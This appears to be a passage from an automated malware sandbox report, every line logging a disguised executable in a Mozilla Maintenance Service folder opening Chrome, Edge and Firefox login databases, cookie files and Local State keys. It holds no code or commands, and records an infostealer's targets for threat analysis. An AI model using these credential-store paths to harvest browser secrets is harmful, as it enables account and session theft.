                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
